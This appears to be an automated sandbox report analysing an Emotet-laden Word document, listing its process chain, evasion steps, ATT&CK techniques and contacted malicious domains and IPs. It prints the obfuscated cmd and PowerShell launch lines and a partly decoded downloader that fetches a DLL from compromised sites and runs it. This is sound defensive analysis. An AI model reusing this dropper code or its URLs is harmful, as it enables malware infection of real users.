                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mjwjtkxgnh\wyssufqxr.vub',Control_RunDLLJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iiasa\gdao.xuk',Control_RunDLLJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kjucifzppxjqp\brxqhmcbxcls.kkx',Control_RunDLLJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Chaxbancxgzy\rbmbxmqpfdk.tvd',Control_RunDLLJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Umbfypagzceb\sgdrbhhkrdu.ucy',Control_RunDLLJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pegimmebijdsrjpt\trbcflzgrjlwmib.jho',Control_RunDLLJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqftsc\netes.ucb',Control_RunDLLJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                    Source: Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2107818605.0000000001E80000.00000002.00000001.sdmp
                    Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: DATA-480841.docInitial sample: OLE summary subject = lime payment B2B responsive Practical solid state copy compelling

                    Data Obfuscation:

                    Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
                    Source: DATA-480841.docStream path 'Macros/VBA/Owppnp8hah4xo788' : High number of GOTO operations
                    Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Owppnp8hah4xo788Name: Owppnp8hah4xo788
                    Obfuscated command line found
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
                    PowerShell case anomaly found
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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 to behavior
                    Suspicious powershell command line found
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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 to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,7_2_1000C620
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10008085 push ecx; ret 7_2_10008098
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004ADA push ecx; ret 7_2_10004AED

                    Persistence and Installation Behavior:

                    Creates processes via WMI
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

                    Hooking and other Techniques for Hiding and Protection:

                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Gpnlsmsow\geunbjvu.dkg:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Mjwjtkxgnh\wyssufqxr.vub:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Iiasa\gdao.xuk:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Kjucifzppxjqp\brxqhmcbxcls.kkx:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Chaxbancxgzy\rbmbxmqpfdk.tvd:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Umbfypagzceb\sgdrbhhkrdu.ucy:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Pegimmebijdsrjpt\trbcflzgrjlwmib.jho:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Pqftsc\netes.ucb:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2408 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\rundll32.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 15_2_0021109C FindFirstFileW
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                    Source: powershell.exe, 00000005.00000002.2107505983.00000000002E4000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                    Source: rundll32.exe, 00000008.00000003.2110699368.0000000000389000.00000004.00000001.sdmp | Binary or memory string: ntnagerVMware_S
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0022C4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_002AC4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_006CC4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_001DC4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_004BC4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_007DC4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0026C4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_006BC4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 15_2_0021C4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10001B30 SetLastError,SetLastError,VirtualAlloc,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10007F07 SetUnhandledExceptionFilter,UnhandledExceptionFilter

                    HIPS / PFW / Operating System Protection Evasion:

                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 5.2.136.90 80
                    Encrypted powershell cmdline option found
                    Source: unknownProcess created: Base64 decoded sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s')) ; $Wi8 =[tyPe]("{2}{3}{7}{1}{4}{6}{5}{8}{0}"-F 'gER','.Net.SERV','SYs','Te','I','tmA','CePOIN','m','Na') ; $ErrorActionPreference = (('Silent'+'ly')+'C'+('on'+'ti')+'n'+'ue');$Ol9onki=$C02W + [char](64) + $A03P;$H27X=('I'+('6'+'7Q')); (gi ("VaR"+"iABLe:k"+"47d") ).vaLue::"CrE`A`T`EDIReCT`ORy"($HOME + (('{'+'0'+'}Ns'+'p'+'zvsg{'+'0}'+'Sj_dwgs{'+'0}') -f [CHAR]92));$T48K=('H'+('61'+'D')); $Wi8::"secuRit`yprO`T`ocoL" = (('Tl'+'s')+'12');$C59M=(('M'+'24')+'P');$Xmmhked = (('R'+'31')+'N');$A69I=(('P_'+'6')+'B');$Q2yg9g_=$HOME+((('1'+'wr')+('Ns'+'pz')+('v'+'sg')+'1w'+('rS'+'j_'+'dw'+'gs1wr'))."rEp`lAce"(([Char]49+[Char]119+[Char]114),'\'))+$Xmmhked+(('.d'+'l')+'l');$U39R=('M0'+'1P');$Qcech4h=(']a'+('n'+'w[3://')+('w'+'ps')+'a'+'pk'+('.co'+'m/wp-'+'ad'+'mi')+('n/v'+'/@')+']'+('anw'+'[3'+'://s')+('ofsu'+'i')+'te'+('.c'+'o')+'m/'+'wp'+('-i'+'nc')+('lud'+'e')+'s/'+('2jm3n'+'Ik/'+'@')+(']a'+'nw[')+'3'+('://veter'+'inaria'+'d')+('rp'+'op')+('ui.co'+'m')+('/'+'co')+'n'+'te'+('nt'+'/5f')+'1'+'8Q'+'/'+'@'+(']a'+'n')+'w'+('[3:'+'//sh'+'op'+'.')+'el'+'e'+('men'+'sl'+'i')+('d'+'e.')+('com'+'/')+'wp'+'-c'+'o'+('n'+'tent')+('/'+'n/'+'@]an')+('w[3'+'://')+'k'+('h'+'an')+('h'+'ho')+('aho'+'m')+('nay.ne'+'t/'+'wordp')+('re'+'s')+('s/'+'C')+('GMC/@'+']')+'an'+'w'+('[3:/'+'/')+('ca'+'m')+('pu'+'se'+'xpo'+'.org/de')+'p'+('ar'+'tmen')+'t'+('-'+'of-odhm')+('mkd/95eX'+'Z'+'Y')+('/@]anw['+'3s://g'+'ur'+'zta'+'c
                    Source: C:\Windows\System32\cmd.exe | Process created: Base64 decoded (same decoded command as the preceding entry)
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD [Base64-encoded command]
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                    Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gpnlsmsow\geunbjvu.dkg',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mjwjtkxgnh\wyssufqxr.vub',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iiasa\gdao.xuk',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kjucifzppxjqp\brxqhmcbxcls.kkx',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Chaxbancxgzy\rbmbxmqpfdk.tvd',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Umbfypagzceb\sgdrbhhkrdu.ucy',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pegimmebijdsrjpt\trbcflzgrjlwmib.jho',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqftsc\netes.ucb',Control_RunDLL
                    Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD [Base64-encoded command]
                    Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD [Base64-encoded command]
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10004C5A cpuid
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007D46 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,7_2_10007D46
                    Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information:

                    Yara detected Emotet

                    Mitre Att&ck Matrix

                    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                    Valid Accounts | Windows Management Instrumentation 11 | Path Interception | Process Injection 111 | Disable or Modify Tools 1 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                    Default Accounts | Scripting 32 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Deobfuscate/Decode Files or Information 3 | LSASS Memory | File and Directory Discovery 3 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Encrypted Channel 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                    Domain Accounts | Native API 1 | Logon Script (Windows) | Logon Script (Windows) | Scripting 32 | Security Account Manager | System Information Discovery 26 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                    Local Accounts | Exploitation for Client Execution 3 | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 1 | NTDS | Security Software Discovery 31 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
                    Cloud Accounts | Command and Scripting Interpreter 211 | Network Logon Script | Network Logon Script | Masquerading 11 | LSA Secrets | Virtualization/Sandbox Evasion 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                    Replication Through Removable Media | PowerShell 3 | Rc.common | Rc.common | Virtualization/Sandbox Evasion 2 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                    External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 111 | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                    Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Hidden Files and Directories 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                    Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Rundll32 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

                    Behavior Graph

                    [Figure: behavior graph, ID 336494, sample DATA-480841.doc, start date 06/01/2021, architecture WINDOWS, score 100. Process chain: cmd.exe starts powershell.exe and msg.exe; powershell.exe starts a chain of nested rundll32.exe processes.]


                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    Source | Detection | Scanner | Label
                    DATA-480841.doc | 60% | Virustotal |

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    Source | Detection | Scanner | Label
                    7.2.rundll32.exe.220000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    9.2.rundll32.exe.6c0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    10.2.rundll32.exe.1d0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    11.2.rundll32.exe.4b0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    13.2.rundll32.exe.260000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    8.2.rundll32.exe.2a0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    15.2.rundll32.exe.210000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    14.2.rundll32.exe.6b0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    12.2.rundll32.exe.7d0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

                    Domains

                    Source | Detection | Scanner | Label
                    veterinariadrpopui.com | 4% | Virustotal |
                    wpsapk.com | 1% | Virustotal |
                    sofsuite.com | 4% | Virustotal |

                    URLs


                    Domains and IPs

                    Contacted Domains

                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    veterinariadrpopui.com | 209.59.139.39 | true | true | | unknown
                    wpsapk.com | 104.18.61.59 | true | true | | unknown
                    sofsuite.com | 104.27.145.251 | true | true | | unknown
                    khanhhoahomnay.net | 210.86.239.69 | true | true | | unknown
                    shop.elemenslide.com | unknown | unknown | true | | unknown

                        Contacted URLs

                        Name | Malicious | Antivirus Detection | Reputation
                        http://veterinariadrpopui.com/content/5f18Q/ | true | Avira URL Cloud: malware | unknown
                        http://sofsuite.com/wp-includes/2jm3nIk/ | true | Avira URL Cloud: safe | unknown
                        http://khanhhoahomnay.net/wordpress/CGMC/ | true | Avira URL Cloud: malware | unknown
                        http://wpsapk.com/wp-admin/v/ | true | Avira URL Cloud: safe | unknown
                        http://5.2.136.90/6tycsc/ | true | Avira URL Cloud: safe | unknown

                        URLs from Memory and Binaries


                                            Contacted IPs


                                            Public

                                            IP | Domain | Country | ASN | ASN Name | Malicious
                                            104.27.145.251 | unknown | United States | 13335 | CLOUDFLARENETUS | true
                                            210.86.239.69 | unknown | Viet Nam | 24173 | NETNAM-AS-APNetnamCompanyVN | true
                                            209.59.139.39 | unknown | United States | 32244 | LIQUIDWEBUS | true
                                            104.18.61.59 | unknown | United States | 13335 | CLOUDFLARENETUS | true
                                            5.2.136.90 | unknown | Romania | 8708 | RCS-RDS73-75DrStaicoviciRO | true

                                            General Information

                                            Joe Sandbox Version:31.0.0 Red Diamond
                                            Analysis ID:336494
                                            Start date:06.01.2021
                                            Start time:08:44:11
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 10m 33s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Sample file name:DATA-480841.doc
                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                            Number of analysed new started processes analysed:17
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • GSI enabled (VBA)
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.expl.evad.winDOC@26/8@7/5
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 91.5% (good quality ratio 88%)
                                            • Quality average: 75.5%
                                            • Quality standard deviation: 25.7%
                                            HCA Information:
                                            • Successful, ratio: 92%
                                            • Number of executed functions: 146
                                            • Number of non-executed functions: 90
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .doc
                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                            • Found warning dialog
                                            • Click Ok
                                            • Attach to Office via COM
                                            • Scroll down
                                            • Close Viewer
                                            Warnings:
                                            • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            Time | Type | Description
                                            08:44:43 | API Interceptor | 1x Sleep call for process: msg.exe modified
                                            08:44:44 | API Interceptor | 57x Sleep call for process: powershell.exe modified
                                            08:44:50 | API Interceptor | 895x Sleep call for process: rundll32.exe modified

